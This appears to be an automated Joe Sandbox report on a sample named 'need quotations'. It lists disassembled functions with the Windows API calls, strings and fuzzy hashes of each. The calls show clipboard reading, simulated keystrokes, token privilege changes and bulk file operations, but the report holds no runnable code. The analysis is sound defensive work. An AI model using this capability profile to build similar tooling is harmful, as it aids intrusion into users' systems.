Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: bc6e46951585386437137fbfab8d20ebdab355d11e66d87e362d952400c34d98
Instruction ID: b6d8764f4977b181128c0260cb9258563bce0cd6158ab88d69db2a5fb97227b4
Opcode Fuzzy Hash: bc6e46951585386437137fbfab8d20ebdab355d11e66d87e362d952400c34d98
Instruction Fuzzy Hash: 7211BF728356409BD7136FA498467697BA0AF41339F254241E4349B1E2C7B58DF08FA2

Function 002439DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: b50799bb57f3897e1ff86564e8106777cbfea0e3276e94f30a853edbde8f0bed
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: C401863142010AEECF08EFA4C8918FEBB74AF10344F108026B51597195EA309A69CF60

Function 00262AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00262AED

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 329631b5dd9259bdf5daf42723408d47c8e99824675c7c270618cf2ff4286224
Instruction ID: cb713c3e7270489438f9bc9fba3e054a5b5e27a1048b79a76c8af38509a1ba4e
Opcode Fuzzy Hash: 329631b5dd9259bdf5daf42723408d47c8e99824675c7c270618cf2ff4286224
Instruction Fuzzy Hash: 65F0C231520606EADF21AFA48C0679F3AA5BF00314F148415B450AB191C7B98EF6EF81

Function 00244252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,002439FE,?,00000001), ref: 00244286

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 69c514e6db4cc0ef273cb7d79fedc94bc6c2362f2dc7de317721b627d7745c40
Instruction ID: d0ae6c05368d5fe7580f1bb1e6ba35f13898bbf1aced8c69b337607e74fbf53f
Opcode Fuzzy Hash: 69c514e6db4cc0ef273cb7d79fedc94bc6c2362f2dc7de317721b627d7745c40
Instruction Fuzzy Hash: 99F01571525B02CFCB38EF64E894916BBE4AF043253248A3EF9D682610C7B299A0DF50

Function 002440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002440C6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: d1f9eef5ccf91b33d9ad115000bc46cca0a7152642565bec43b4e5d9089cc2ad
Instruction ID: e0eb750cc46c23803da2c4f119527691e857039f1d0a12cfc3c794783d61bab8
Opcode Fuzzy Hash: d1f9eef5ccf91b33d9ad115000bc46cca0a7152642565bec43b4e5d9089cc2ad
Instruction Fuzzy Hash: BCE0C2366002245BCB11A658DC4AFEA77ADDF88AA0F0900B5F909E7244DAA4A9C18A90

Function 01949678 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01949689

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 6594ac40f98998a89cee92b2d2205285d3751defebb99eec4d35ef8853982389
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2AE0E67494010EDFDB00DFB4D94969E7BB4EF04301F100261FD05D2280D6319D50CA62

Non-executed Functions

Function 002AF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 002AF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002AF8DC
GetWindowLongW.USER32(?,000000F0), ref: 002AF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002AF940
SendMessageW.USER32 ref: 002AF966
_wcsncpy.LIBCMT ref: 002AF9D2
GetKeyState.USER32(00000011), ref: 002AF9F3
GetKeyState.USER32(00000009), ref: 002AFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002AFA16
GetKeyState.USER32(00000010), ref: 002AFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002AFA4F
SendMessageW.USER32 ref: 002AFA72
SendMessageW.USER32(?,00001030,?,002AE059), ref: 002AFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 002AFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002AFB96
SetCapture.USER32(?), ref: 002AFB9F
ClientToScreen.USER32(?,?), ref: 002AFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002AFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 002AFC29
ReleaseCapture.USER32 ref: 002AFC34
GetCursorPos.USER32(?), ref: 002AFC69
ScreenToClient.USER32(?,?), ref: 002AFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 002AFCD8
SendMessageW.USER32 ref: 002AFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 002AFD41
SendMessageW.USER32 ref: 002AFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002AFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 002AFD8F
GetCursorPos.USER32(?), ref: 002AFDB0
ScreenToClient.USER32(?,?), ref: 002AFDBD
GetParent.USER32(?), ref: 002AFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 002AFE3F
SendMessageW.USER32 ref: 002AFE6F
ClientToScreen.USER32(?,?), ref: 002AFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002AFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 002AFF19
SendMessageW.USER32 ref: 002AFF3C
ClientToScreen.USER32(?,?), ref: 002AFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002AFFB6
GetWindowLongW.USER32(?,000000F0), ref: 002B004B

Strings

@GUI_DRAGID, xrefs: 002AFBCC
F, xrefs: 002AFF42

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 85dcf07f2e7a9389acef353056240c39bfb92305f3e5e2b72216d5de9730472b
Instruction ID: 0e7154a527cf4713ef7960f372eb0af73b493126010e24ac6ba5c6b014b7d6bc
Opcode Fuzzy Hash: 85dcf07f2e7a9389acef353056240c39bfb92305f3e5e2b72216d5de9730472b
Instruction Fuzzy Hash: 0232F270514305EFDB21CFA4C984FAABBA8FF4A344F140629F595872A1CB79DC24CB51

Function 002AAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002AB1CD

Strings

%d/%02d/%02d, xrefs: 002AAEFC

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: a2694d5f2165e8ed310f9dbcda79ace887dcb5204ca46681d7a69a292a1fedcb
Instruction ID: 2071d0440d6e35a1630ea5e96c011d4ea1717d95c16136b92dfa9c5451763287
Opcode Fuzzy Hash: a2694d5f2165e8ed310f9dbcda79ace887dcb5204ca46681d7a69a292a1fedcb
Instruction Fuzzy Hash: 6E12CE71520309ABEB258F64DC49FAE7BB8FF46710F204129FA19DB2D1DBB18951CB11

Function 0025EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0025EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002B3AEA
IsIconic.USER32(000000FF), ref: 002B3AF3
ShowWindow.USER32(000000FF,00000009), ref: 002B3B00
SetForegroundWindow.USER32(000000FF), ref: 002B3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B3B20
GetCurrentThreadId.KERNEL32 ref: 002B3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002B3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002B3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002B3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 002B3B54
SetForegroundWindow.USER32(000000FF), ref: 002B3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B6C
keybd_event.USER32(00000012,00000000), ref: 002B3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B81
keybd_event.USER32(00000012,00000000), ref: 002B3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B8F
keybd_event.USER32(00000012,00000000), ref: 002B3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B9E
keybd_event.USER32(00000012,00000000), ref: 002B3BA3
SetForegroundWindow.USER32(000000FF), ref: 002B3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 002B3BCD

Strings

Shell_TrayWnd, xrefs: 002B3AE5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 634c9d53eff2c3c2940060870b781d499cf92f41533974c9aaac8b24b7904de6
Instruction ID: 148f92a59c06eaddffac884e12d701462f0428bd2a09ceb5a59ea72842789376
Opcode Fuzzy Hash: 634c9d53eff2c3c2940060870b781d499cf92f41533974c9aaac8b24b7904de6
Instruction Fuzzy Hash: 0331A771A503187BEB205F65AC4DFBF7E6CEB84B94F104025FA05EA1D0D6B05D10EAA0

Function 0027ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0027B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
Part of subcall function 0027B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
Part of subcall function 0027B134: GetLastError.KERNEL32 ref: 0027B1BA

_memset.LIBCMT ref: 0027AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0027AD5A
CloseHandle.KERNEL32(?), ref: 0027AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0027AD82
GetProcessWindowStation.USER32 ref: 0027AD9B
SetProcessWindowStation.USER32(00000000), ref: 0027ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0027ADBF

Part of subcall function 0027AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0027ACC0), ref: 0027AB99
Part of subcall function 0027AB84: CloseHandle.KERNEL32(?,?,0027ACC0), ref: 0027ABAB

Strings

, xrefs: 0027AD17
H*/, xrefs: 0027AE40
winsta0, xrefs: 0027AD7D
default, xrefs: 0027ADBA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*/$default$winsta0
API String ID: 2063423040-3152231795
Opcode ID: eef198e7c57917807b95772f4224ba97bb0e6b8066e2daab3b64a6010c54b349
Instruction ID: 75830c48a0e5d83446c3670ca89a5c21298f77fd5f2ffb950f76dda685cb52ff
Opcode Fuzzy Hash: eef198e7c57917807b95772f4224ba97bb0e6b8066e2daab3b64a6010c54b349
Instruction Fuzzy Hash: 45819E7182020AAFDF119FA4DC49EEEBB78FF45314F148129F918A21A1D7318E64DF62

Function 002860DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00285FA6,?), ref: 00286EF1

Part of subcall function 0028725E: __wsplitpath.LIBCMT ref: 0028727B
Part of subcall function 0028725E: __wsplitpath.LIBCMT ref: 0028728E

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

_wcscat.LIBCMT ref: 00286149
_wcscat.LIBCMT ref: 00286167
__wsplitpath.LIBCMT ref: 0028618E
FindFirstFileW.KERNEL32(?,?), ref: 002861A4
_wcscpy.LIBCMT ref: 00286209
_wcscat.LIBCMT ref: 0028621C
_wcscat.LIBCMT ref: 0028622F
lstrcmpiW.KERNEL32(?,?), ref: 0028625D
DeleteFileW.KERNEL32(?), ref: 0028626E
MoveFileW.KERNEL32(?,?), ref: 00286289
MoveFileW.KERNEL32(?,?), ref: 00286298
CopyFileW.KERNEL32(?,?,00000000), ref: 002862AD
DeleteFileW.KERNEL32(?), ref: 002862BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002862E1
FindClose.KERNEL32(00000000), ref: 002862FD
FindClose.KERNEL32(00000000), ref: 0028630B

Strings

\*.*, xrefs: 00286138, 00286147, 00286165

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: df2745430792d1483ca17dd5142758276ca68d1fcfda88623c85848cf7f12e4b
Instruction ID: 2f6ba0b949b689093d908d0e8283fde6816dc3e6726c85a8aeaae2aed0b69b19
Opcode Fuzzy Hash: df2745430792d1483ca17dd5142758276ca68d1fcfda88623c85848cf7f12e4b
Instruction Fuzzy Hash: C251617681911C6ACB21FB91DC48DEFB7BCAF04300F0900EAE549E3141DE72A7998FA5

Function 00296B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(002DDC00), ref: 00296B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00296B44
GetClipboardData.USER32(0000000D), ref: 00296B4C
CloseClipboard.USER32 ref: 00296B58
GlobalLock.KERNEL32(00000000), ref: 00296B74
CloseClipboard.USER32 ref: 00296B7E
GlobalUnlock.KERNEL32(00000000), ref: 00296B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00296BA0
GetClipboardData.USER32(00000001), ref: 00296BA8
GlobalLock.KERNEL32(00000000), ref: 00296BB5
GlobalUnlock.KERNEL32(00000000), ref: 00296BE9
CloseClipboard.USER32 ref: 00296CF6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 17df3b77d6c73ad44dd5265593f02861cc6d3e17532d6955b36140b00640eed2
Instruction ID: 0799c4f8421ff23f0dad4d61a30d6f7631be4839a6733f66c11c157550fa8d7e
Opcode Fuzzy Hash: 17df3b77d6c73ad44dd5265593f02861cc6d3e17532d6955b36140b00640eed2
Instruction Fuzzy Hash: 2C519131210202ABD714AF64ED5EF6E77E8EF84B04F10442AF986E61E1EF70D915CB62

Function 0028F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028F62B
FindClose.KERNEL32(00000000), ref: 0028F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0028F6E2
__swprintf.LIBCMT ref: 0028F72E
__swprintf.LIBCMT ref: 0028F767
__swprintf.LIBCMT ref: 0028F7BB

Part of subcall function 0026172B: __woutput_l.LIBCMT ref: 00261784

__swprintf.LIBCMT ref: 0028F809
__swprintf.LIBCMT ref: 0028F858
__swprintf.LIBCMT ref: 0028F8A7
__swprintf.LIBCMT ref: 0028F8F6

Strings

%4d, xrefs: 0028F761
%02d, xrefs: 0028F7B0, 0028F7B9, 0028F807, 0028F856, 0028F8A5, 0028F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 0028F728

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 177802f89077f7f60304c9b9b81eb6e9bd3a24e27bb835963cca6285729ea42c
Instruction ID: ddbcf4ecc1f22ea45869e969959d1ea68bb396aa3b52685f6681b6c2fd2204ef
Opcode Fuzzy Hash: 177802f89077f7f60304c9b9b81eb6e9bd3a24e27bb835963cca6285729ea42c
Instruction Fuzzy Hash: 8DA14272414344ABC354EF94C885DAFB7ECEF99704F44092EF585C2192EB34E969CB62

Function 00291B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00291B50
_wcscmp.LIBCMT ref: 00291B65
_wcscmp.LIBCMT ref: 00291B7C
GetFileAttributesW.KERNEL32(?), ref: 00291B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00291BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00291BC0
FindClose.KERNEL32(00000000), ref: 00291BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00291BE7
_wcscmp.LIBCMT ref: 00291C0E
_wcscmp.LIBCMT ref: 00291C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00291C37
SetCurrentDirectoryW.KERNEL32(002F39FC), ref: 00291C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00291C5F
FindClose.KERNEL32(00000000), ref: 00291C6C
FindClose.KERNEL32(00000000), ref: 00291C7C

Strings

*.*, xrefs: 00291BE2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: db2e360a4529fc279b18ae572f875841e6d0cf216ddc7df621578456f20b15fe
Instruction ID: 5ecc0fcd3dddc4818d98a92f614d911056ce79e4f36f50661dfff2a17a03ec58
Opcode Fuzzy Hash: db2e360a4529fc279b18ae572f875841e6d0cf216ddc7df621578456f20b15fe
Instruction Fuzzy Hash: 5B31C33255021B6ADF10EFB1EC49EEE77AC9F05324F1441A6E905D2090EBB0DAB58A64

Function 00291C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00291CAB
_wcscmp.LIBCMT ref: 00291CC0
_wcscmp.LIBCMT ref: 00291CD7

Part of subcall function 00286BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00286BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00291D06
FindClose.KERNEL32(00000000), ref: 00291D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00291D2D
_wcscmp.LIBCMT ref: 00291D54
_wcscmp.LIBCMT ref: 00291D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00291D7D
SetCurrentDirectoryW.KERNEL32(002F39FC), ref: 00291D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00291DA5
FindClose.KERNEL32(00000000), ref: 00291DB2
FindClose.KERNEL32(00000000), ref: 00291DC2

Strings

*.*, xrefs: 00291D28

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
